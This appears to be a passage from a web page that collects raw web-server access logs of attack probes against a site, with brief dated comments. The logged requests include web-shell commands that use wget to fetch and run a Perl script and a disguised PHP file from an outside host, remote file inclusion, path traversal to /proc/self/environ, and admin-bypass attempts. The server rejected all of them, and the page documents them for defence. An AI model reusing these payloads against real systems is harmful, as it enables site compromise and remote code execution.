213.251.187.189 - - [01/May/2014:08:06:27 +0000] "GET /Office/Frontpage/images/stories/asu.php?rf HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.251.187.189 - - [01/May/2014:08:06:29 +0000] "GET /images/stories/asu.php?rf HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.251.187.189 - - [01/May/2014:08:06:30 +0000] "GET /Office/Frontpage/images/stories/asu.php?rf HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.251.187.189 - - [01/May/2014:08:07:21 +0000] "GET /images/stories/asu.php?rf HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.251.187.189 - - [01/May/2014:08:07:22 +0000] "GET /Office/Frontpage/images/stories/asu.php?rf HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.251.187.189 - - [01/May/2014:08:07:29 +0000] "GET /Office/Frontpage/images/stories/asu.php?rf HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

[Jan 12, 2014] Example of meaningless probes

117.120.2.129 - - [12/Jan/2014:15:32:17 +0000] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 403 82 "-" "BOT/0.1 (BOT for JCE)"
117.120.2.129 - - [12/Jan/2014:15:32:16 +0000] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 400 - "-" "BOT/0.1 (BOT for JCE)"
117.120.2.129 - - [12/Jan/2014:15:32:17 +0000] "GET /images/stories/bojog.php?selem HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
117.120.2.129 - - [12/Jan/2014:15:32:18 +0000] "GET //images/stories/bojog.php?cmd=wget%20http://mds.energetica.com.au/plugins/content/robot.txt;perl%20robot.txt;perl%20robot.txt;perl%20robot.txt;perl%20robot.txt;perl%20robot.txt;rm%20-fr%20robot.txt HTTP/1.1" 403 82 "-"  s/content/black.jpg;mv%20black.jpg%20emi.php;rm%20-fr%20black.jpg HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
117.120.2.129 - - [12/Jan/2014:15:32:19 +0000] "GET /images/stories/emi.php HTTP/1.1" 410 95 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
117.120.2.129 - - [12/Jan/2014:15:32:19 +0000] "POST /Office/Frontpage/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 403 82 "-" "BOT/0.1 (BOT for JCE)"
117.120.2.129 - - [12/Jan/2014:15:32:19 +0000] "POST /Office/Frontpage/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 400 - "-" "BOT/0.1 (BOT for JCE)"
117.120.2.129 - - [12/Jan/2014:15:32:19 +0000] "GET /images/stories/emi.php HTTP/1.1" 410 95 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
117.120.2.129 - - [12/Jan/2014:15:32:19 +0000] "GET /Office/Frontpage/images/stories/bojog.php?selem HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
117.120.2.129 - - [12/Jan/2014:15:32:20 +0000] "GET /images/stories/emi.php HTTP/1.1" 410 95 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
117.120.2.129 - - [12/Jan/2014:15:32:20 +0000] "GET /Office/Frontpage//images/stories/bojog.php?cmd=wget%20http://mds.energetica.com.au/plugins/content/robot.txt;perl%20robot.txt;perl%20robot.txt;perl%20robot.txt;perl%20robot.txt;perl%20robot.txt;rm%20-fr%20robot.txt HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
117.120.2.129 - - [12/Jan/2014:15:32:20 +0000] "GET /Office/Frontpage//images/stories/bojog.php?cmd=wget%20http://mds.energetica.com.au/plugins/content/black.jpg;mv%20black.jpg%20emi.php;rm%20-fr%20black.jpg HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
117.120.2.129 - - [12/Jan/2014:15:32:20 +0000] "GET /Office/Frontpage/images/stories/emi.php HTTP/1.1" 410 95 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
117.120.2.129 - - [12/Jan/2014:15:32:21 +0000] "GET /Office/Frontpage/images/stories/emi.php HTTP/1.1" 410 95 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
117.120.2.129 - - [12/Jan/2014:15:32:21 +0000] "GET /Office/Frontpage/images/stories/emi.php HTTP/1.1" 410 95 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
117.120.2.129 - - [12/Jan/2014:15:32:24 +0000] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 403 82 "-" "BOT/0.1 (BOT for JCE)"
117.120.2.129 - - [12/Jan/2014:15:32:23 +0000] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 400 - "-" "BOT/0.1 (BOT for JCE)"
117.120.2.129 - - [12/Jan/2014:15:32:24 +0000] "GET /images/stories/bojog.php?selem HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
117.120.2.129 - - [12/Jan/2014:15:32:24 +0000] "GET //images/stories/bojog.php?cmd=wget%20http://mds.energetica.com.au/plugins/content/robot.txt;perl%20robot.txt;perl%20robot.txt;perl%20robot.txt;perl%20robot.txt;perl%20robot.txt;rm%20-fr%20robot.txt HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
117.120.2.129 - - [12/Jan/2014:15:32:25 +0000] "GET //images/stories/bojog.php?cmd=wget%20http://mds.energetica.com.au/plugins/content/black.jpg;mv%20black.jpg%20emi.php;rm%20-fr%20black.jpg HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
117.120.2.129 - - [12/Jan/2014:15:32:25 +0000] "GET /images/stories/emi.php HTTP/1.1" 410 95 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
117.120.2.129 - - [12/Jan/2014:15:32:26 +0000] "GET /images/stories/emi.php HTTP/1.1" 410 95 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
117.120.2.129 - - [12/Jan/2014:15:32:26 +0000] "GET /images/stories/emi.php HTTP/1.1" 410 95 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
117.120.2.129 - - [12/Jan/2014:15:32:27 +0000] "POST /Office/Frontpage/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 403 82 "-" "BOT/0.1 (BOT for JCE)"
117.120.2.129 - - [12/Jan/2014:15:32:26 +0000] "POST /Office/Frontpage/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 400 - "-" "BOT/0.1 (BOT for JCE)"
117.120.2.129 - - [12/Jan/2014:15:32:27 +0000] "GET /Office/Frontpage/images/stories/bojog.php?selem HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
117.120.2.129 - - [12/Jan/2014:15:32:27 +0000] "GET /Office/Frontpage//images/stories/bojog.php?cmd=wget%20http://mds.energetica.com.au/plugins/content/robot.txt;perl%20robot.txt;perl%20robot.txt;perl%20robot.txt;perl%20robot.txt;perl%20robot.txt;rm%20-fr%20robot.txt HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
117.120.2.129 - - [12/Jan/2014:15:32:28 +0000] "GET /Office/Frontpage//images/stories/bojog.php?cmd=wget%20http://mds.energetica.com.au/plugins/content/black.jpg;mv%20black.jpg%20emi.php;rm%20-fr%20black.jpg HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
117.120.2.129 - - [12/Jan/2014:15:32:28 +0000] "GET /Office/Frontpage/images/stories/emi.php HTTP/1.1" 410 95 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
117.120.2.129 - - [12/Jan/2014:15:32:29 +0000] "GET /Office/Frontpage/images/stories/emi.php HTTP/1.1" 410 95 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
117.120.2.129 - - [12/Jan/2014:15:32:29 +0000] "GET /Office/Frontpage/images/stories/emi.php HTTP/1.1" 410 95 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

[Sep 07, 2012] Offensive IP Database

Example how you can aggregate HTTP logs data from multiple servers in a single web form
IP Hostname Country Time
60.248.226.131 60-248-226-131.HINET-IP.hinet.net TW 2012-09-07 13:07:03
82.201.169.89 host-82-201-169-89.static.link.com.eg EG 2012-09-07 13:17:48

[Aug 29, 2012] Some recent examples of blind probes.

Those attacks are really look very crude. I wonder why they repeat the same request again and again? ...

91.121.89.20 - - [28/Aug/2012:09:21:27 -0700] "POST /Lang/cpp.shtml%22%20class=%22resultLink/admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
91.121.89.20 - - [28/Aug/2012:09:21:27 -0700] "POST /Lang/cpp.shtml%22%20class=%22resultLink/admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
91.121.89.20 - - [28/Aug/2012:09:21:28 -0700] "POST /Lang/cpp.shtml%22%20class=%22resultLink/admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
91.121.89.20 - - [28/Aug/2012:09:21:29 -0700] "POST /admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
91.121.89.20 - - [28/Aug/2012:09:21:29 -0700] "POST /admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
91.121.89.20 - - [28/Aug/2012:09:21:30 -0700] "POST /admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
91.121.89.20 - - [28/Aug/2012:09:21:30 -0700] "POST /Lang/admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
91.121.89.20 - - [28/Aug/2012:09:21:31 -0700] "POST /Lang/admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
91.121.89.20 - - [28/Aug/2012:09:21:31 -0700] "POST /Lang/admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
5.39.112.251 - - [28/Aug/2012:09:22:04 -0700] "GET /Admin/humor.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Admin/humor.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
93.188.8.141 - - [28/Aug/2012:09:23:54 -0700] "GET /admin/product.php/password_forgotten.php HTTP/1.1" 403 82 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
93.188.8.141 - - [28/Aug/2012:09:23:54 -0700] "GET /extras/curltest.php HTTP/1.1" 403 82 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
188.187.141.189 - - [28/Aug/2012:09:48:02 -0700] "GET /Commercial_linuxes/Suse/index.php HTTP/1.0" 403 82 "http://www.softpanorama.org/index.php" "Opera/9.80 (Windows NT 6.1; U; YB/3.5.1; ru) Presto/2.6.30 Version/10.63"
188.187.141.189 - - [28/Aug/2012:09:48:04 -0700] "GET /index.php HTTP/1.0" 403 82 "http://www.softpanorama.org/index.php" "Opera/9.80 (Windows NT 6.1; U; YB/3.5.1; ru) Presto/2.6.30 Version/10.63"
5.39.112.251 - - [28/Aug/2012:09:56:19 -0700] "GET /Editors/tcl_editors.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Editors/tcl_editors.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
207.126.61.161 - - [28/Aug/2012:10:28:00 -0700] "GET /About/Stats//index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%0000 HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
207.126.61.161 - - [28/Aug/2012:10:28:00 -0700] "GET //index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%0000 HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
207.126.61.161 - - [28/Aug/2012:10:28:00 -0700] "GET /About//index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%0000 HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
61.56.203.11 - - [28/Aug/2012:10:33:31 -0700] "GET /Scripting/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://recycleengineering.com/itrecycle/tmp/install_4e8971c78d252/arm7/html/com_tools/daster.jpg?? HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
61.56.203.11 - - [28/Aug/2012:10:33:33 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=test?? HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
61.56.203.11 - - [28/Aug/2012:10:33:34 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://recycleengineering.com/itrecycle/tmp/install_4e8971c78d252/arm7/html/com_tools/daster.jpg?? HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
200.98.145.36 - - [28/Aug/2012:10:34:02 -0700] "GET /Malware/index2.php?p=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
200.98.145.36 - - [28/Aug/2012:10:34:02 -0700] "GET /index2.php?p=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
5.39.112.251 - - [28/Aug/2012:10:42:59 -0700] "GET /Office/html_editors.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Office/html_editors.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
91.121.115.109 - - [28/Aug/2012:10:43:40 -0700] "GET /Malware/Malicious_web/zombies.shtml//index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%0000 HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
91.121.115.109 - - [28/Aug/2012:10:43:40 -0700] "GET //index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%0000 HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
91.121.115.109 - - [28/Aug/2012:10:43:41 -0700] "GET /Malware/Malicious_web//index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%0000 HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
93.188.8.141 - - [28/Aug/2012:10:49:40 -0700] "GET /Security/admin/sqlpatch.php/password_forgotten.php?action=execute HTTP/1.1" 403 82 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
93.188.8.141 - - [28/Aug/2012:10:49:40 -0700] "GET /Security/admin/sqlpatch1.php/password_forgotten.php?action=execute HTTP/1.1" 403 82 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
93.188.8.141 - - [28/Aug/2012:10:49:41 -0700] "GET /Security/admin/sq1patch.php/password_forgotten.php?action=execute HTTP/1.1" 403 82 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
93.188.8.141 - - [28/Aug/2012:10:49:41 -0700] "GET /Security/admin/sq1p4tch.php/password_forgotten.php?action=execute HTTP/1.1" 403 82 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
93.188.8.141 - - [28/Aug/2012:10:49:41 -0700] "GET /Security/admin/sqlpatch.php/password_forgotten.php?action=execute HTTP/1.1" 403 82 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
93.188.8.141 - - [28/Aug/2012:10:49:42 -0700] "GET /Security/admin/sqlpatch.php1/password_forgotten.php?action=execute HTTP/1.1" 403 82 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
93.188.8.141 - - [28/Aug/2012:10:49:42 -0700] "GET /Security/admin/sqlpatch1.php/password_forgotten.php?action=execute HTTP/1.1" 403 82 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
93.188.8.141 - - [28/Aug/2012:10:49:43 -0700] "GET /Security/admin/sq1patch.php/password_forgotten.php?action=execute HTTP/1.1" 403 82 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
93.188.8.141 - - [28/Aug/2012:10:49:43 -0700] "GET /Security/admin/sq1p4tch.php/password_forgotten.php?action=execute HTTP/1.1" 403 82 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
93.188.8.141 - - [28/Aug/2012:10:49:44 -0700] "GET /Security/admin/sqlpatch.php1/password_forgotten.php?action=execute HTTP/1.1" 403 82 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
93.188.8.141 - - [28/Aug/2012:10:49:47 -0700] "GET /admin/sqlpatch.php/password_forgotten.php?action=execute HTTP/1.1" 403 82 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
93.188.8.141 - - [28/Aug/2012:10:49:47 -0700] "GET /admin/sqlpatch1.php/password_forgotten.php?action=execute HTTP/1.1" 403 82 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
93.188.8.141 - - [28/Aug/2012:10:49:48 -0700] "GET /admin/sq1patch.php/password_forgotten.php?action=execute HTTP/1.1" 403 82 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
93.188.8.141 - - [28/Aug/2012:10:49:48 -0700] "GET /admin/sq1p4tch.php/password_forgotten.php?action=execute HTTP/1.1" 403 82 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
93.188.8.141 - - [28/Aug/2012:10:49:49 -0700] "GET /admin/sqlpatch.php1/password_forgotten.php?action=execute HTTP/1.1" 403 82 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
93.188.8.141 - - [28/Aug/2012:10:49:49 -0700] "GET /admin/sqlpatch.php/password_forgotten.php?action=execute HTTP/1.1" 403 82 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
93.188.8.141 - - [28/Aug/2012:10:49:49 -0700] "GET //admin/record_company.php/password_forgotten.php HTTP/1.1" 403 82 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
93.188.8.141 - - [28/Aug/2012:10:49:49 -0700] "GET /admin/sqlpatch1.php/password_forgotten.php?action=execute HTTP/1.1" 403 82 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
93.188.8.141 - - [28/Aug/2012:10:49:50 -0700] "GET //admin/record_company.php/password_forgotten.php HTTP/1.1" 403 82 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
93.188.8.141 - - [28/Aug/2012:10:49:50 -0700] "GET /admin/sq1patch.php/password_forgotten.php?action=execute HTTP/1.1" 403 82 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
93.188.8.141 - - [28/Aug/2012:10:49:50 -0700] "GET //admin/record_company.php/password_forgotten.php HTTP/1.1" 403 82 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
93.188.8.141 - - [28/Aug/2012:10:49:50 -0700] "GET /admin/sq1p4tch.php/password_forgotten.php?action=execute HTTP/1.1" 403 82 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
93.188.8.141 - - [28/Aug/2012:10:49:51 -0700] "GET //admin/record_company.php/password_forgotten.php HTTP/1.1" 403 82 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
93.188.8.141 - - [28/Aug/2012:10:49:51 -0700] "GET /admin/sqlpatch.php1/password_forgotten.php?action=execute HTTP/1.1" 403 82 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
93.188.8.141 - - [28/Aug/2012:10:49:51 -0700] "GET //admin/record_company.php/password_forgotten.php HTTP/1.1" 403 82 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
93.188.8.141 - - [28/Aug/2012:10:49:51 -0700] "GET //admin/record_company.php/password_forgotten.php HTTP/1.1" 403 82 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
93.188.8.141 - - [28/Aug/2012:10:49:52 -0700] "GET //admin/record_company.php/password_forgotten.php HTTP/1.1" 403 82 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
93.188.8.141 - - [28/Aug/2012:10:49:52 -0700] "GET //admin/record_company.php/password_forgotten.php HTTP/1.1" 403 82 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
93.188.8.141 - - [28/Aug/2012:10:49:53 -0700] "GET //admin/record_company.php/password_forgotten.php HTTP/1.1" 403 82 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
93.188.8.141 - - [28/Aug/2012:10:49:53 -0700] "GET //admin/record_company.php/password_forgotten.php HTTP/1.1" 403 82 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
5.39.112.251 - - [28/Aug/2012:11:12:55 -0700] "GET /Commercial_linuxes/linux_acl.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Commercial_linuxes/linux_acl.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
5.9.199.112 - - [28/Aug/2012:11:19:24 -0700] "GET /scripting/php.shtml HTTP/1.1" 403 82 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
217.25.31.21 - - [28/Aug/2012:11:30:13 -0700] "GET /Logs/log_security.shtml//xmlrpc.php/xmlprc.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
217.25.31.21 - - [28/Aug/2012:11:30:13 -0700] "GET //xmlrpc.php/xmlprc.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
217.25.31.21 - - [28/Aug/2012:11:30:14 -0700] "GET /Logs//xmlrpc.php/xmlprc.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
209.172.50.183 - - [28/Aug/2012:11:37:18 -0700] "GET /Tools/http://www.movinginn.co.uk//index.php?option=com_properties&controller=../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 403 82 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
209.172.50.183 - - [28/Aug/2012:11:37:18 -0700] "GET /http://www.movinginn.co.uk//index.php?option=com_properties&controller=../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 403 82 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
5.39.112.251 - - [28/Aug/2012:13:20:26 -0700] "GET /Utilities/dir_sync.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Utilities/dir_sync.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
37.220.26.62 - - [28/Aug/2012:13:32:06 -0700] "HEAD /history/hesilverhand.com/twacks/index.php?PHPSESSID=3114b73036790fa90aff2300bb08ce7e&topic=16451.15 HTTP/1.0" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50"
2.93.27.123 - - [28/Aug/2012:13:47:00 -0700] "GET /Malware/Malicious_web/Bulletin/web_zombies_bulletin070623.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Malware/Malicious_web/Bulletin/web_zombies_bulletin070623.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
65.52.108.12 - - [28/Aug/2012:13:54:30 -0700] "GET /Tools/tar.shtml/index.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
5.39.112.251 - - [28/Aug/2012:14:24:21 -0700] "GET /Bookshelf/excel.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Bookshelf/excel.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
5.39.112.251 - - [28/Aug/2012:14:56:54 -0700] "GET /Solaris/solaris_whitepapers.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Solaris/solaris_whitepapers.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
5.39.112.251 - - [28/Aug/2012:15:06:22 -0700] "GET /Scripting/php.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Scripting/php.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
5.39.112.251 - - [28/Aug/2012:15:27:53 -0700] "GET /Editors/ctags.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Editors/ctags.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
184.170.246.3 - - [28/Aug/2012:15:36:17 -0700] "POST /contact.php HTTP/1.1" 403 82 "-" "Mozilla/3.0 (OS/2; U)"
